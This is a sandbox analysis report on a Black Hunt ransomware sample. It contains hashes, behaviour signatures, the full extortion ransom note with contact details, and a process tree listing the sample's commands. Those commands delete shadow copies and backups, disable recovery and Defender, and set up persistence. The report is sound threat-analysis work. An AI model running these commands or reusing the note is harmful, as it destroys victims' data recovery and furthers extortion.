Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    9s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/01/2024, 00:56

General

  • Target

    cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe

  • Size

    707KB

  • MD5

    fe824c146fe0974cf6b1b87f30034caf

  • SHA1

    8a2d1d2556c080482bab8e5b06d0072a8325ebff

  • SHA256

    cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022

  • SHA512

    18a2115f9b5ae8a3bf93352d7af652b0685b5ad4a57014b9faee4e29972fce06205a0c3f5732bcea66aa24e50b65f462a6182d1dfb9dce379cbb193a1940d9cc

  • SSDEEP

    6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1l8Evnh:6uaTmkZJ+naie5OTamgEoKxLWw6h

Malware Config

Extracted

Path

C:\ProgramData\#BlackHunt_ReadMe.hta

Ransom Note
<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="x-ua-compatible" content="ie=9"><meta charset="UTF-8"><HTA:APPLICATION icon="#" WINDOWSTATE="maximize" scroll="no" SELECTION="yes" contextmenu="no" caption="yes" SYSMENU="no" innerBorder="yes" SHOWINTASKBAR="yes" singleInstance="yes" /><meta name="viewport" content="width = device-width,initial-scale=1.0"><style>a,abbr,acronym,address,applet,article,aside,audio,b,big,blockquote,body,canvas,caption,center,cite,code,dd,del,details,dfn,div,dl,dt,em,embed,fieldset,figcaption,figure,footer,form,h1,h2,h3,h4,h5,h6,header,hgroup,html,i,iframe,img,ins,kbd,label,legend,li,mark,menu,nav,object,ol,output,p,pre,q,ruby,s,samp,section,small,span,strike,strong,sub,summary,sup,table,tbody,td,tfoot,th,thead,time,tr,tt,u,ul,var,video{margin:0;padding:0;border:0;font-size:100%;font:inherit;vertical-align:baseline}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:'';content:none}table{border-collapse:collapse;border-spacing:0}</style><style>body,html{background-color:#dadada;font-family:'Segoe UI',Tahoma,Geneva,Verdana,sans-serif;font-weight:600;font-size:16px}a{text-decoration:none;color:#0483ab}div.header{margin-top:15px;margin-bottom:5px;width:100%}div.header h1{width:97%;text-align:left;font-size:30px;font-weight:900;margin:auto}div.header h1 span#black{display:inline-block;color:#000;margin-right:0;padding:2px 2px}div.header h1 span#hunter{display:inline-block;color:#e90303;background-color:#000;padding:2px 8px;margin-left:0}div.header h1 span#hunter span#version{font-size:12px}div.message div.head-encrypted-msg{width:100%}div.message div.head-encrypted-msg h1{font-size:330%;width:97%;margin:auto;text-align:center;font-weight:700}div.message div.head-encrypted-msg h1 span{display:inline-block;color:#000;background-color:#e90303;padding:0 8px 0 8px;margin-right:3px}div.message div.head-attention-msg{width:97%;margin:auto;text-align:center;margin-top:1%;border:1px solid #e90303;background-color:#f1caca;border-radius:5px;font-size:250%;padding-top:10px;padding-bottom:10px}div.message div.head-attention-msg p{margin-bottom:.5%}div.message div.head-attention-msg p span{color:#e90303}div.content{margin:auto;margin-top:2%}div.content div.content-head-msg{font-size:32px;text-align:left;font-weight:600}div.content div.content-boxes{margin:auto;margin-top:2%}div.content div.box{width:96%;margin:auto;border-radius:5px;margin-bottom:30px}div.content div.content-left-box{background-color:#c5cfd8;padding:40px 0 40px 20px;font-size:24px;position:relative;border-left:15px solid #1878cf}div.content div.content-left-box h3.left-box-title{background-color:#1878cf;display:inline-block;padding:10px 10px;border-radius:5px;color:#fff;position:absolute;top:-22px;margin-left:auto;margin-right:auto;left:0;right:0;width:20%;text-align:center}div.content div.content-left-box div.content-contact-directly *{font-weight:600!important;line-height:1.4em}div.content div.content-left-box div.content-contact-directly h4{font-size:24px;font-weight:500;margin-top:8px}div.content div.content-left-box div.content-contact-directly h4#tox{font-weight:600;display:inline-block;margin-left:3px}div.content div.content-left-box div.content-contact-directly div.tox-id{margin-left:6%}div.content div.content-left-box div.content-contact-directly h4#tox-id{font-size:24px}div.content div.content-left-box div.content-contact-directly p#tox-id-p{font-size:16px}div.content div.content-left-box div.content-contact-directly h4#download-tox{display:inline-block;margin-left:6%}div.content div.content-left-box div.content-contact-directly p#download-tox-p{display:inline-block}div.content div.content-left-box div.content-contact-directly h4#email{display:inline-block;font-weight:600;margin-left:3px}div.content div.content-left-box div.content-contact-directly p#email-p{display:inline-block;font-size:24px;margin-left:8px}div.content div.content-left-box div.content-contact-directly h4#user-id{font-weight:500;margin-left:3px}div.content div.content-left-box div.content-contact-directly h4#user-id span{color:#e90303}div.content div.content-left-box div.content-contact-tor{margin-top:50px;font-weight:600!important}div.content div.content-left-box div.content-contact-tor h3{font-size:24px}div.content div.content-left-box div.content-contact-tor h3 span{color:#e90303}div.content div.content-left-box div.content-contact-tor div.content-tor-inside{margin-left:6;margin-top:10px}div.content div.content-left-box div.content-contact-tor div.content-tor-inside p{margin-top:8px}div.content div.content-left-box div.content-contact-tor div.content-tor-inside p img{position:relative;bottom:-3px}div.content div.content-right-box{background-color:#efb0b0;padding:40px 0 40px 20px;font-size:24px;position:relative;border-left:15px solid #e90303}div.content div.content-right-box h3.right-box-title{background-color:#e90303;display:inline-block;padding:10px 10px;border-radius:5px;color:#fff;position:absolute;top:-22px;margin-left:auto;margin-right:auto;left:0;right:0;width:20%;text-align:center}div.content div.content-right-box p{color:#000;font-size:22px;font-weight:600;margin-top:9px;line-height:1.4em}div.content div.content-left-box p{color:#000;font-size:22px;font-weight:600;margin-top:9px;line-height:1.4em}div.content div.content-left-box p span{color:#e90303;font-weight:700;font-size:24px}</style><title>Black Hunt</title></head><body><div class="header"><h1><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIMAAAAWCAYAAADjNi+WAAAACXBIWXMAAC4jAAAuIwF4pT92AAALpWlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNi4wLWMwMDIgNzkuMTY0NDYwLCAyMDIwLzA1LzEyLTE2OjA0OjE3ICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOmRjPSJodHRwOi8vcHVybC5vcmcvZGMvZWxlbWVudHMvMS4xLyIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0RXZ0PSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VFdmVudCMiIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bWxuczpwaG90b3Nob3A9Imh0dHA6Ly9ucy5hZG9iZS5jb20vcGhvdG9zaG9wLzEuMC8iIHhtbG5zOnRpZmY9Imh0dHA6Ly9ucy5hZG9iZS5jb20vdGlmZi8xLjAvIiB4bWxuczpleGlmPSJodHRwOi8vbnMuYWRvYmUuY29tL2V4aWYvMS4wLyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgMjEuMiAoV2luZG93cykiIHhtcDpDcmVhdGVEYXRlPSIyMDIyLTEwLTEzVDEyOjMyOjAyKzAzOjMwIiB4bXA6TWV0YWRhdGFEYXRlPSIyMDIzLTA0LTA3VDA0OjIxOjI1KzA0OjMwIiB4bXA6TW9kaWZ5RGF0ZT0iMjAyMy0wNC0wN1QwNDoyMToyNSswNDozMCIgZGM6Zm9ybWF0PSJpbWFnZS9wbmciIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6NGRiOTQ5OGItYTg5Mi0yMTRjLTliYzgtZTZlMDM3ZTYzYmJkIiB4bXBNTTpEb2N1bWVudElEPSJhZG9iZTpkb2NpZDpwaG90b3Nob3A6ZGVlODIyNjgtMDA3Ni0wNDQ2LWFjMGEtMzk2OTY3MzA0YTdjIiB4bXBNTTpPcmlnaW5hbERvY3VtZW50SUQ9InhtcC5kaWQ6MjcyMzA2NjctZDM0ZC1lMjRmLWJlNTUtMDQyMWY2MmY3ZWI1IiBwaG90b3Nob3A6Q29sb3JNb2RlPSIzIiBwaG90b3Nob3A6SUNDUHJvZmlsZT0ic1JHQiBJRUM2MTk2Ni0yLjEiIHRpZmY6T3JpZW50YXRpb249IjEiIHRpZmY6WFJlc29sdXRpb249IjMwMDAwMDAvMTAwMDAiIHRpZmY6WVJlc29sdXRpb249IjMwMDAwMDAvMTAwMDAiIHRpZmY6UmVzb2x1dGlvblVuaXQ9IjIiIGV4aWY6Q29sb3JTcGFjZT0iMSIgZXhpZjpQaXhlbFhEaW1lbnNpb249IjQ0OSIgZXhpZjpQaXhlbFlEaW1lbnNpb249Ijg5Ij4gPHhtcE1NOkhpc3Rvcnk+IDxyZGY6U2VxPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0iY3JlYXRlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDoyNzIzMDY2Ny1kMzRkLWUyNGYtYmU1NS0wNDIxZjYyZjdlYjUiIHN0RXZ0OndoZW49IjIwMjItMTAtMTNUMTI6MzI6MDIrMDM6MzAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCAyMS4yIChXaW5kb3dzKSIvPiA8cmRmOmxpIHN0RXZ0OmFjdGlvbj0ic2F2ZWQiIHN0RXZ0Omluc3RhbmNlSUQ9InhtcC5paWQ6NzU5MzVkMTMtYjM0OS02ZTRiLWIwODctYzc5ZTJmZGNiNzgwIiBzdEV2dDp3aGVuPSIyMDIyLTEwLTEzVDEyOjMyOjE0KzAzOjMwIiBzdEV2dDpzb2Z0d2FyZUFnZW50PSJBZG9iZSBQaG90b3Nob3AgMjEuMiAoV2luZG93cykiIHN0RXZ0OmNoYW5nZWQ9Ii8iLz4gPHJkZjpsaSBzdEV2dDphY3Rpb249InNhdmVkIiBzdEV2dDppbnN0YW5jZUlEPSJ4bXAuaWlkOmJiMmZiMmMyLWRjNDUtMzE0Yy1iMmQxLWRjNzFlZGUwNWJlYSIgc3RFdnQ6d2hlbj0iMjAyMy0wNC0wN1QwNDoyMToyNSswNDozMCIgc3RFdnQ6c29mdHdhcmVBZ2VudD0iQWRvYmUgUGhvdG9zaG9wIDIxLjIgKFdpbmRvd3MpIiBzdEV2dDpjaGFuZ2VkPSIvIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJjb252ZXJ0ZWQiIHN0RXZ0OnBhcmFtZXRlcnM9ImZyb20gYXBwbGljYXRpb24vdm5kLmFkb2JlLnBob3Rvc2hvcCB0byBpbWFnZS9wbmciLz4gPHJkZjpsaSBzdEV2dDphY3Rpb249ImRlcml2ZWQiIHN0RXZ0OnBhcmFtZXRlcnM9ImNvbnZlcnRlZCBmcm9tIGFwcGxpY2F0aW9uL3ZuZC5hZG9iZS5waG90b3Nob3AgdG8gaW1hZ2UvcG5nIi8+IDxyZGY6bGkgc3RFdnQ6YWN0aW9uPSJzYXZlZCIgc3RFdnQ6aW5zdGFuY2VJRD0ieG1wLmlpZDo0ZGI5NDk4Yi1hODkyLTIxNGMtOWJjOC1lNmUwMzdlNjNiYmQiIHN0RXZ0OndoZW49IjIwMjMtMDQtMDdUMDQ6MjE6MjUrMDQ6MzAiIHN0RXZ0OnNvZnR3YXJlQWdlbnQ9IkFkb2JlIFBob3Rvc2hvcCAyMS4yIChXaW5kb3dzKSIgc3RFdnQ6Y2hhbmdlZD0iLyIvPiA8L3JkZjpTZXE+IDwveG1wTU06SGlzdG9yeT4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6YmIyZmIyYzItZGM0NS0zMTRjLWIyZDEtZGM3MWVkZTA1YmVhIiBzdFJlZjpkb2N1bWVudElEPSJhZG9iZTpkb2NpZDpwaG90b3Nob3A6YTU3NzljMGQtYzI3Zi05ZjQ2LWJmMjgtYjQ2MzIzZjQ5ZjQxIiBzdFJlZjpvcmlnaW5hbERvY3VtZW50SUQ9InhtcC5kaWQ6MjcyMzA2NjctZDM0ZC1lMjRmLWJlNTUtMDQy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 " alt=""></h1></div><div class="message"><div class="head-encrypted-msg"><h1>YOUR<span>WHOLE NETWORK</span>HAS BEEN PENETRATED BY<span>Black Hunt</span>!</h1></div><div class="head-attention-msg"><p>We also have uploaded your sensitive data, which we Will leak or sell in case of no cooperation!</p><p><span>Restore your data possible only buying private key from us</span></p></div></div><div class="content"><div class="content-boxes"><div class="content-right-box box"><h3 class="right-box-title">ATTENTION</h3><p>remember, there are many middle man services out there pretending that they can recover or decrypt your files , whom neither will contact us or scam you, Remember we are first and last solution for your files otherwise you will only waste money and time</p><p>trying to decrypt your files without our decryptor and through third party softwares will make your files completely useless, there is no third party decryptor since we are the only key holders</p><p>we have uploaded many critical data and information from your machines , we won't leak or sell any of them in Case of successful Corporation, however if we don't hear from you in 14 days we will either sell or leak your data in many forums</p><p></p><p>Remain all of your files untouched, do not change their name, extension and...</p></div><div class="content-left-box box"><h3 class="left-box-title">CONTACT US</h3><p>Your system is offline. in order to contact us you can email this address<span> [email protected] </span>this ID (<span> v7560Oy2NZhHasSO </span>) for the title of your email.</p><p>If you weren't able to contact us whitin 24 hours please email:<span> [email protected] </span></p><p>Check your data situation in<a href="#"><span> http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion </span></a></p></div></div></div></body></html>
URLs

http-equiv="x-ua-compatible"

http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion

Extracted

Path

C:\ProgramData\#BlackHunt_ReadMe.hta

Ransom Note
YOUR WHOLE NETWORK HAS BEEN PENETRATED BY Black Hunt ! We also have uploaded your sensitive data, which we Will leak or sell in case of no cooperation! Restore your data possible only buying private key from us ATTENTION remember, there are many middle man services out there pretending that they can recover or decrypt your files , whom neither will contact us or scam you, Remember we are first and last solution for your files otherwise you will only waste money and time trying to decrypt your files without our decryptor and through third party softwares will make your files completely useless, there is no third party decryptor since we are the only key holders we have uploaded many critical data and information from your machines , we won't leak or sell any of them in Case of successful Corporation, however if we don't hear from you in 14 days we will either sell or leak your data in many forums Remain all of your files untouched, do not change their name, extension and... CONTACT US Your system is offline. in order to contact us you can email this address [email protected] this ID ( v7560Oy2NZhHasSO ) for the title of your email. If you weren't able to contact us whitin 24 hours please email: [email protected] Check your data situation in http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
URLs

http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion

Signatures

  • Deletes NTFS Change Journal 2 TTPs 2 IoCs

    The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs 5 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
  • Renames multiple (1123) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes backup catalog 3 TTPs 2 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 6 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 12 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe
    "C:\Users\Admin\AppData\Local\Temp\cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe"
    1⤵
    • UAC bypass
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:1144
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
      2⤵
        PID:740
        • C:\Windows\system32\reg.exe
          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
          3⤵
            PID:5128
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
          2⤵
            PID:1612
            • C:\Windows\system32\reg.exe
              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
              3⤵
                PID:8560
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
              2⤵
                PID:3528
                • C:\Windows\system32\reg.exe
                  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                  3⤵
                    PID:12452
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                  2⤵
                    PID:5084
                    • C:\Windows\system32\reg.exe
                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                      3⤵
                        PID:12440
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                      2⤵
                        PID:4440
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                          3⤵
                          • Interacts with shadow copies
                          PID:11244
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                        2⤵
                          PID:5204
                          • C:\Windows\system32\wbadmin.exe
                            wbadmin.exe delete catalog -quiet
                            3⤵
                            • Deletes backup catalog
                            PID:13164
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                          2⤵
                            PID:5260
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                            2⤵
                              PID:5188
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                              2⤵
                                PID:5168
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                                2⤵
                                  PID:316
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
                                  2⤵
                                    PID:2188
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
                                    2⤵
                                      PID:1136
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                      2⤵
                                        PID:2240
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                                        2⤵
                                          PID:4860
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\cecca40d436cb48722c2be55044822400ccecc1ed2aa4b37005bd5b7608ff022.exe" /F
                                          2⤵
                                            PID:3672
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f
                                            2⤵
                                              PID:1560
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                              2⤵
                                                PID:3988
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
                                                2⤵
                                                  PID:4700
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
                                                  2⤵
                                                    PID:5044
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
                                                    2⤵
                                                      PID:3364
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f
                                                      2⤵
                                                        PID:5112
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
                                                        2⤵
                                                          PID:4812
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                                          2⤵
                                                            PID:2748
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                            2⤵
                                                              PID:2724
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
                                                              2⤵
                                                                PID:60
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
                                                                2⤵
                                                                  PID:4720
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
                                                                  2⤵
                                                                    PID:2352
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
                                                                    2⤵
                                                                      PID:3188
